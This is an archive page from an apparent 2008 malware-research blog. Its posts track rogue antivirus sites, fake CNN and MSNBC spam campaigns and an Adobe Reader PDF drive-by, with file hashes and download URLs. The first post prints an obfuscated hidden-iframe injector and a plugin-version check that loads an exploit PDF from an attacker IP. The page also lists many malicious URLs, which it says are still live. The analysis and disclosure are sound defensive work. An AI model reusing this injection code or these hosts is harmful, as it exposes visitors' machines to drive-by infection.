Archive for the 'Antivirus 2008' Category

31
Aug

Adobe Acrobat Reader PDF Exploit (gnu.pdf & us.pdf) (UPDATED)

By djpnuemo Comments
Categories: Antivirus 2008, Database Update, IFRAME, MalSpam, Malicious Links, Malware, Rogue Software and Vulnerabilities

This morning we’ve found a website that automatically loads an infected pdf file.

When the user is directed to the infected site, there is a hidden iframe that loads the pdf file. Here’s what happens…

Links still live, proceed at your own risk.

User visits hxxp://120.50.46.90/~admin/tps/index.php and the following obfuscated code is included

<script language=”javascript”>document.write(unescape(’%3C%69%66%72
%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%36%39%2E
%34%36%2E%32%37%2E%34%31%2F%61%66%78%76%2F%74%70%76%2F%69
%6E%64%65%78%2E%70%68%70%22%20%77%69%64%74%68%3D%31%20%68
%65%69%67%68%74%3D%31%20%73%74%79%6C%65%3D%22%76%69%73%69
%62%69%6C%69%74%79%3A%68%69%64%64%65%6E%3B%70%6F%73%69%74
%69%6F%6E%3A%61%62%73%6F%6C%75%74%65%22%3E%3C%2F%69%66
%72%61%6D%65%3E’));</script>

when deobfuscated…

<iframe src=”http://69.46.27.41/afxv/tpv/index.php” width=1 height=1 style=”visibility:hidden;position:absolute”></iframe>

We can see the hidden iframe above and the page includes the following code…

<script>
ppdf=0;
i=0;
for(;navigator.plugins[i];i++)
{
re=/.d.{2}e.A.{2}o…..l..-.+?([0-9]+.[0-9]+)/;
if(res=re.exec(navigator.plugins[i].description))
{
ppdf=res[1];
}
var re=/.h.{5}v.+?s.\s([0-9])\S([0-9]).+?([0-9]{1,5})/;
var res;
if(res=re.exec(navigator.plugins[i].description))
{
flash=res[1]+’.'+res[2]+’.'+res[3];
}
}
ppdfenable=0;
if(ppdf!=0)
{
ppdfenable=0;
ppdf=ppdf.replace(/\D/g,”");
if(ppdf[0]==7 && ppdf[1]<1)ppdfenable=1;
if(ppdf[0]<7)ppdfenable=1;if(ppdfenable)
{
document.write(’<iframe width=1 height=1 src=”hxxp://69.46.27.41/afxv/tpv/gnu.pdf”></iframe>’);
}
}
</script>

Thus leading us to the pdf in question located at hxxp://69.46.27.41/afxv/tpv/gnu.pdf. Here is additional information regarding this file. This is also available in /pnuemo-malware/.

gnu.pdf
Result: 6/35 (17.15%)
MD5: 213d20a0523b6ea6c93d4348a509c34c
VirusTotal

Update your software!

UPDATED 9/1 12p PST

us.pdf
Result: 10/36 (27.78%)
MD5: 8175212481f069a6dd54de9cbd044039
VirusTotal
hxxp://174.133.121.165/us.pdf
hxxp://88.85.95.134/us.pdf

25
Aug

Antivirus 2008 Pro XP

By ion Comments
Categories: Antivirus 2008, Antivirus XP 2008, E-mail, LOTD, Malicious Domains, Rogue Anti-Malware, Rogue Security Software, Rogue Software and Social Engineering

We came across a new domain name registered at estdomains today. This site may appear seamlessly legitimate, as it sports a support page, affiliate page, terms of service, etc. But we can assure you that it is a bad site. Be aware of this site and do not download any of the files associated with it! Site: hxxp://antivirus2008proxp.com

What it looks like:

Antivirus 2008 Pro XP

Removal:

Remove this threat with MalwareBytes!

21
Aug

MS Antivirus 2008 morphed from XP Antivirus 2008

By lithium Comment
Categories: Antivirus 2008, Database Update, LOTD, MS Antivirus 2008, Malicious Domains, Malicious Links, Malware and Rogue Anti-Malware

We detected a new XP Antivirus 2008 rogue security software site branded as “MS Antivirus 2008″. The file, MSASetup.exe comes from hxxp://msantivirusxp.com/install.php and is undetected by most AV vendors at the moment.

MS Antivirus 2008

File: MSASetup.exe
File size: 1037918 bytes
MD5…: 1f58d870738aaebb12ed7ece90781c6a
SHA1..: d8f030275b571dea6b8836f433e933cc5e6a1834
MDB: /lithium-malware/MSASetup.zip

We also detected other new sites pushing out rogue anti-malware product.

Antivirus 09

Site:http://antivirus-purchasing.com/
Distributes: Antivirus 09
File: None yet

Site:http://antivirusfreescan2009.com/
Distributes: Antivirus 09
File: AV2009Install_.exe
DL Link: hxxp://antivirusfreescan2009.com/2009/download/trial/AV2009Install_*.exe

Removal:

Remove this threat with MalwareBytes!

19
Aug

The International Virus Research Lab Strikes Again!

By lithium Comments
Categories: Antivirus 2008, Antivirus 2009, Database Update, Malicious Domains, Malicious Links and Rogue Software

Here are some new domains pushing out malicious binaries.  All of the files have been made available in /lithium-malware/AVXP08_1.zip

Screen shots:
hxxp://supersolution-freeantivirus.com/antivirus

antivirus2

avxp08

powerav09

Site: hxxp://antivirus-bestsolution.net
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: 0044fd9dbf39280ec10ba88068637e5e
SHA1..: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://antivirus4protection.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://antivirusproxp.com
Distributes:Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://freebest-antivirus.net/
Distributes: IVRL Defender
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site:hxxp://goodantivirus-free.net/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site:hxxp://noadwareantivirus.com
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: 0044fd9dbf39280ec10ba88068637e5e
SHA1..: d4ae99b5b490047038bf0c8a3277d3a8b42f6be9
SHA256: b7c4c4f8cf54b4fe87571b28915a38d95b05dc6b8d1a36dfaec746de8e697d78

Site: hxxp://pwrantivirus2009.com/
Distributes: Power Antivirus 2009
Files: Install.exe
MD5…: a06b0ec8cecd60abcad508bcbdf467e4
SHA1..: dd2999afa470d56a460a3c216c0e34023e0deaa7
SHA256: 6519623940729b4d00c98494c309c60b5b2cad31ad5108c7876bf1e011876ea7

Site: hxxp://scanner-pwrantivirus.com (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://scanner-xpertantivirus.com/ (Russian Federation)
Distributes: None yet
Files: None yet

Site: hxxp://solution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-antivirus.com/
Distributes: IVRL Defender
Files: Install.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

Site: hxxp://supersolution-freeantivirus.com/
Distributes: Antivirus XP 2008
Files: Setup.exe
MD5…: b6ffa3a1c9e5ea0bd58fd2a38d42e71a
SHA1..: a60d2e00d3e35e8213ee3067eb2f3f99871b92b4
SHA256: b33b9e3dd5a662d5e11dc5d5f6df13e2b1afc4be217c3553fb0f3981591c432d

18
Aug

“Weekly top news” (new)

By quine Comments
Categories: Antivirus 2008, MalSpam and Malware

In the same vein as the recent fake CNN and MSNBC malspam campaigns, a new one is floating around with the subject line of “Weekly top news”, with the sender’s name “Top News Agency”:

picture-21

The content of the e-mail purports to link to a number of “breaking” news items and “shocking” videos:

picture-1

The infected sites look rather plain (no images from real news sites) with another false video embed and “ActiveX Object Error”:

picture-31

Funny enough, clicking on the “Close this page” button at the top attempts to redirect to hxxp://79.135.167.18/antivirus, but due to a bit of a coding error on the behalf of the bad guys/gals, it looks like they only appended that URL to the existing one, e.g. hxxp://[infected site]/URL=hxxp://79.135.167.18/antivirus…yielding a 404:

picture-41

Now, when attempting to navigate away from the page (or reload, too, of course), the user is presented with another warning dialog, stating that they haven’t finished their virus scan! GASP!

picture-5

The dropper looks to be very similar to the ones we’ve already seen in the fake CNN and MSNBC campaigns, so nothing terribly new here. Two different filenames, scaner.exe [sic] and install.exe. Same tactic to get the user to download the dropper, too (simply direct them to it). Judging by what we’ve seen so far, this one’s going to download “Antivirus XP 2008″ again, so nothing new there, either.

SHA256(install.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca
SHA256(scaner.exe)= c5c3c45d488028bb5978cdababde1e90a18ea4ba994ad1eb6205399b04a4faca

16
Aug

Database Update and New Malicious Domains

By lithium Comments
Categories: Antivirus 2008, Database Update and Malware

File added to MDB: lithium-malware/IVRL-Antivirus-600457.zip

Taken from: hxxp://antivirus0003.com/download.php

XP Antivirus 2008

  1. Antivirus-XP-2008.exe (18A752131BF9770050613D030DC62125)
    1. Result: 1/35 (2.86%)
  2. Update-August-2008.exe (90DC33CDFAFF72799962F678BA7EB88F)
    1. Result: 10/36 (27.78%)
    2. ThreatExpert

Sites Added:

  • antivirus0003.com
  • antivirus0004.com
  • antivirus0005.com
  • antivirus0006.com
  • antivirus0007.com
  • antivirus0015.com
  • antivirus2009online.com
  • antivirusxp-pro.com
  • antivirusxp2009.com
  • pwrantivirus.com
  • theantivirusscan.com
  • wista-antivirus2009.com
  • xpertantivirus.com
13
Aug

“msnbc.com - BREAKING NEWS” (update)

By quine Comments
Categories: Antivirus 2008, MalSpam and Malware

The content of the infected sites has changed, now accurately imitating MSNBC sites:

picture-4

Additionally, the downloader, adobe_flash.exe, appears to be slightly different, as a new checksum is represented:

SHA256(adobe_flash.exe)= 2fb8a4ecb561475b52883b535ce9810e6021ebe666e16e89cbbc86018d153547

Analysis to come.

13
Aug

“msnbc.com - BREAKING NEWS” (new)

By quine Comments
Categories: Antivirus 2008, CNN, MalSpam and Malware

It looks like a campaign has begun, similar to the fake CNN alerts, using MSNBC “Breaking News” notification e-mails:

Updated Subject Lines:

  • msnbc.com - BREAKING NEWS: Time Warner sells AOL
  • msnbc.com - BREAKING NEWS: How to save money on gas
  • msnbc.com - BREAKING NEWS: Americans loves to sue people
  • msnbc.com - BREAKING NEWS: Millions of credic card numbers stolen from bank database, find out if you are affected
  • msnbc.com -BREAKING NEWS: Mary-Kate Olsen implicated in Heath Ledger’s death

picture-2

The hyperlink purporting to be hxxp://breakingnews.msnbc.com actually points to the malicious domain, wherein is hosted what appears to be the same content as the fake CNN campaign:

picture-3

Just like before, the content of the infected site/page is replete with plenty of escaped text waiting to be decoded by a document.write(unescape…) call down near the bottom. The downloader, adobe_flash.exe, appears to be the same one used in the CNN-oriented campaign. Looks like they’re not changing much.

SHA256(adobe_flash.exe)= a629c6ea28327a467e666a2a7d5a5ccc3194858b2217f608431b98dff268c2d9

05
Aug

Sponsored Result != Safe

By lithium Comments
Categories: Antivirus 2008, Database Update and Malware

We have been monitoring several malware campaigns lately and we are noticing the distribution spread from just spam e-mails to social networking sites to search engine sponsored results.

A good example is the CNN Top 10 malspam campaign we exposed yesterday. The e-mail comes off as legit to the average user and leads to infection.

In a malware related google search we entered the search term “CNN Top 10 XP Antivirus” and found a sponsored result for a rogue anti-malware product, Antivirus XP 2008.

Google search with malicious results

Free online check! New Generation.

Search Results

If we click the link we are taken to a rogue anti-malware site, hxxp://antivirus-xp-2008.net. *Warning* Live malicious site! Proceed at your own risk** It’s appears legit, offers a free scan, and even sports badges from PC Magazine, Sun, Microsoft, Intel. ICSA, Checkmark, and VB100 to keep it looking like a credible site.

XP Antivirus

If we download the files we get a zip file with 2 files. The files are pretty much undetected across the board because they are so new. We have included the JoeBox Sandbox reports for you to look at.

Zip Contents

Antivirus-XP-2008.exe
-> VirusTotal: Result: 6/36 (16.67%) CDFAE03CA18BBAF307A77F9BA2BB7B38
->JoeBox Sandbox: JoeBox Sandbox Report

Update-July-2008.exe
-> VirusTotal: Result: 3/36 (8.34%) 2E3D63ED9BFF383926FBD34449513928
-> JoeBox Sandbox: JoeBox Sandbox Report

*UPDATED 835pm*

Found more sponsored links by simply searching “antivirus software” on Google. Same exact setup on a different domain name hxxp://2008antivirusxp.com.

avxp2k8ad

More results on other search engines (click image for Virustotal results)…

adwaredlad

*UPDATED 8-06-08*

Another sponsored link was found for rogue antivirus software on a different domain hxxp://xp-2008.com.  This was found by searching ‘antivirus’.  This has potential for misleading many people because also searching ‘norton antivirus’, ‘mcafee antivirus’, ‘panda antivirus’, or any other REAL software, will be presented with this advertisement.

xpav2k8ad

04
Aug

Malspam CNN E-mail points to get_flash_update.exe malware.

By lithium Comments
Categories: Antivirus 2008, CNN, Codec, Database Update, MalSpam, Malware and Uncategorized

We came across a malspam e-mail today that looks like an authentic CNN Top 10 e-mail blast. The e-mail arrives in HTML format and covers the daily top 10 news items.

Update: We have found several other domains serving the same malware with different hashes.

*warning* These are live malicious sites. Proceed at your own risk!

hxxp://aramusicaiespectacles.com/cnnvideo.html
hxxp://art-cie.fr/cnnnews.html
hxxp://barrierelectric.com/cnnvideo.html
hxxp://beta.wwf.it/cnnvideo.html
hxxp://borinsrl-store.com/index2.html
hxxp://cave-live.info/cnnvideo.html
hxxp://colleflambo.com/cnnvideo.html
hxxp://datgame.com/cnnnews.html
hxxp://directorioelejido.com/cnnvideo.html
hxxp://erbilproje.com/cnnvideo.html
hxxp://eyhost.net/
hxxp://familylaw-nj.com/cnnvideo.html
hxxp://lorenziniassociati.it/cnnnews.html
hxxp://megadent.pl/index2.html
hxxp://nodostudio.com/cnnnews.html
hxxp://ophtha.com.co/cnnnews.html
hxxp://pastry-art.de/cnnnews.html
hxxp://pcenmarcha.com/cnnnews.html
hxxp://piedrarustica.com/cnnvideo.html
hxxp://showtech.myzen.co.uk/cnnvideo.html
hxxp://studiogabia.com/cnnnews.html
hxxp://style-r.de/cnnnews.html
hxxp://synerweb.info/cnnvideo.html
hxxp://turegalodesanvalentin-julieta.idoo.com/index2.html
hxxp://videogamesheaven.dot5hosting.com/cnnnews.html
hxxp://voxinterna.de/index2.html
hxxp://www.bellomeparrucchieri.it/cnnnews.html
hxxp://www.drtimcic.org/cnnvideo.html
hxxp://www.konaya.com.tw/cnnnews.html
hxxp://www.malicioso.net/cnnvideo.html
hxxp://www.massouristudios.gr/cnnvideo.html
hxxp://www.transam99.de/cnnvideo.html
hxxp://www.uwg-groebenzell.de/cnnnews.html
hxxp://www.vonalpenhirsch.be/cnnnews.html

CNN E-mail

Some of the titles include:

Corrupt China official betrayed by leaky toilet
Olympic Sport: Blocking the Internet
Boy Loses Arm in Gator Attack
Guinea Pigs Get Dressed … and Eaten
Angry, late, tired passengers make computers crash
Don’t streak, get drunk or sleep outside at Olympics
Paris Hilton’s mom takes offense at McCain’s humor
Cheesus! Jesus Spotted in a Cheeto
It’s a buyer’s market if you know what ‘code words’ to look for.
Cheesus! Jesus Spotted in a Cheeto
Half-scale replica of German tank built for paintball competition.
Dog Plays Mom for Tiger Cubs
6 Police Die in Pre-Olympic Attack
Illusionist Chris Angel races against time in a building set to detonate.
Drunken Man Can’t Erase Arrest
Social networking sites have lots of users, but no one seems to be buying.
Bush urgently flies to Asia
Furnished Nazi bunkers surface in Denmark
6 NFL greats inducted into the pro football hall of fame

When we click on the link it points us to hxxp://yooia97.com/news/ which is a page designed to get us to download the get_flash_update.exe malicious “codec”.

CNN Malspam site

Additional information
File size: 78848 bytes
MD5…: 1fe971d98216e26b0817451943af270b
SHA1..: 882fda149f33451fa5ba9abc73db72f50f71cbbe
SHA256: 2cb4320aa298fe330faf5d54c05d224c7dbd28a921ce452fa4c19497c1125d7f
SHA512: b5aea389775f9566a896e9510ad761fc05f00cfeb2694d2c35331f83d9154378
97bc06888ad6f5ad405a316e568561c9a457004be300c8c67fbbc56d57892609
PEiD..: -
PEInfo: PE Structure information

( base data )
entrypointaddress.: 0×409f66
timedatestamp…..: 0×487d1ddb (Tue Jul 15 21:59:55 2008)
machinetype…….: 0×14c (I386)

( 3 sections )
name viradd virsiz rawdsiz ntrpy md5
.text 0×1000 0xdf4d 0xc200 8.00 dcf98a98a287684df152670d3c406344
.rdata 0xf000 0×36dc 0×2200 7.98 f45a3f588bfbffda48509cf3caa4c860
.data 0×13000 0×6000 0×4000 4.86 6325a094a4e4462c96bbaab6919ae28d

( 3 imports )
> WININET.DLL: GopherFindFirstFileA, GopherOpenFileW, FtpGetFileW, FreeUrlCacheSpaceA, HttpQueryInfoA
> USER32.DLL: DrawIcon, DestroyCaret, FillRect, GetActiveWindow, GetMonitorInfoW, GetShellWindow
> ADVAPI32.DLL: ReportEventW, RegFlushKey, DecryptFileW, ReadEventLogW, OpenThreadToken

( 0 exports )

ThreatExpert info: http://www.threatexpert.com/report.aspx?md5=1fe971d98216e26b0817451943af270b
Prevx info: http://info.prevx.com/aboutprogramtext.asp?PX5=290F32F1001BC75F34CC01D334F83300C0FDDB47


« Previous Entries

Malware Database Forum



Click for

Malware Removal Information



Special Deals


$20 Off Panda Internet Security 2009

 

December 2008
M T W T F S S
« Nov    
1234567
891011121314
15161718192021
22232425262728
293031  

Support Malware Database!


Security Engineering: A Guide to Building Dependable Distributed Systems

Reversing: Secrets of Reverse Engineering

Crimeware: Understanding New Attacks and Defenses (Symantec Press)

Security Power Tools

IT Security Interviews Exposed: Secrets to Landing Your Next Information Security Job

Windows Command-Line Administrator's Pocket Consultant, 2nd Edition

CompTIA Security+ Certification Kit